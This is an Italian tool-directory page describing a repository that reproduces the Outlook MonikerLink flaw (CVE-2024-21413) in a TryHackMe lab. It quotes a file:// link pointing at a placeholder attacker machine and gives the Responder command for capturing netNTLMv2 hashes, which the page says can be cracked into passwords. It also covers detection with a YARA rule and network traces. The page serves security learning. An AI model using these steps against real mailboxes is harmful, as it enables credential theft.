Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/gurleen-147/cve-2024-21413-microsoft-outlook-remote-code-execution-vulnerability-poc
Password CrackingAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubgurleen-147/cve-2024-21413-microsoft-outlook-remote-code-execution-vulnerability-poc

CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability-PoC

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Questo repository contiene note di ricerca e un proof-of-concept (PoC) di alto livello per CVE-2024-21413, una vulnerabilità osservata in alcuni client di posta elettronica durante la gestione di collegamenti in stile SMB/moniker incorporati nei messaggi. Il PoC e gli esperimenti qui documentati sono stati eseguiti in un ambiente di laboratorio controllato su sistemi.

Vedi Repository
239 mesi faNon ancora revisionato
Condividi

💻 CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability-PoC

🧩 Panoramica

Questo progetto riproduce il comportamento MonikerLink (CVE-2024-21413) in un ambiente TryHackMe completamente isolato per mostrare come determinati formati di collegamenti ipertestuali possano indurre Outlook a elaborare un link in modo da perdere tentativi di autenticazione o portare a ulteriori exploit. Il risultato è un PoC e una serie prioritaria di mitigazioni e suggerimenti di rilevamento che i team di sicurezza possono applicare. Nessun sistema live/non autorizzato è stato preso di mira.


⚙️ Strumenti e tecnologie

Strumento / CompetenzaScopo
PythonSviluppo dello script
Linux (Kali)Sistema target
MetasploitExploitation & accesso
TryHackMe LabAmbiente controllato

🚀 Configurazione ed esecuzione

  • Aprire il terminale su Linux sulla macchina attaccante
    • Creato un file python e incollato il codice exploit.py

      Questo codice è scritto da CMNatic e può essere trovato qui

    • Ho modificato il codice per adattarlo all'ambiente della mia macchina.

      Ad esempio, nella riga “<a href=“file://ATTACKER_MACHINE/test!” ho sostituito "ATTACKER_MACHINE" con l'indirizzo IP della mia macchina attaccante e nella riga “server = smtplib.SMTP('MAILSERVER', 25)” ho cambiato "MAILSERVER" con l'indirizzo IP della macchina vittima.

    • Poi ho eseguito il file exploit.py e ho ricevuto la risposta "the email has been sent"
    • Per catturare il netNTLMv2 (si tratta di un hash che può essere decriptato usando John the ripper o altri strumenti e si possono recuperare le password in chiaro). Quindi ho usato uno strumento chiamato responder per catturare la risposta dalla macchina vittima. Il comando per eseguire responder era:

      responder -I ens5

      • Qui -I indica l'interfaccia e ho usato l'interfaccia ens5. Nel mio caso il comando ha mostrato un errore, quindi per risolverlo ho prima usato il seguente comando e poi ho riprovato il comando precedente, e ha funzionato

        systemctl start systemd-resolved

  • Poi ho effettuato l'accesso alla mia macchina vittima
    • Ho aperto Outlook e ho aperto il link all'interno della mail che ho inviato dalla macchina attaccante
  • In questo modo, con un solo clic sul link, il responder sulla mia macchina attaccante è stato in grado di catturare l'hash netNTLMv2 hash netNTLMv2

Questa proof-of-concept mette in luce una sfumatura nella gestione dei link di Microsoft Outlook: alcuni link moniker di tipo file:// che fanno riferimento a risorse SMB possono eludere il filtro standard di Outlook e provocare tentativi di autenticazione in uscita. Il comportamento qui dimostrato è stato riprodotto in un laboratorio TryHackMe completamente controllato e sottolinea come formati di link apparentemente innocui possano mascherare interazioni di rete. Sebbene siano state rilasciate patch e linee guida per il rilevamento da parte del fornitore, i meccanismi sottostanti rimangono complessi a causa degli usi legittimi dello schema moniker/file. È importante notare che l'attività generata da questo PoC è osservabile a livello di rete (ad esempio, nelle catture di pacchetti che mostrano tentativi di autenticazione NTLM), rendendola adatta per analisi forensi e indagini sugli incidenti.

Rilevamento

Una regola Yara è stata creata da Florian Roth per rilevare le email contenenti l'elemento :file:\:. Immagine Wireshark

Scarica lo strumento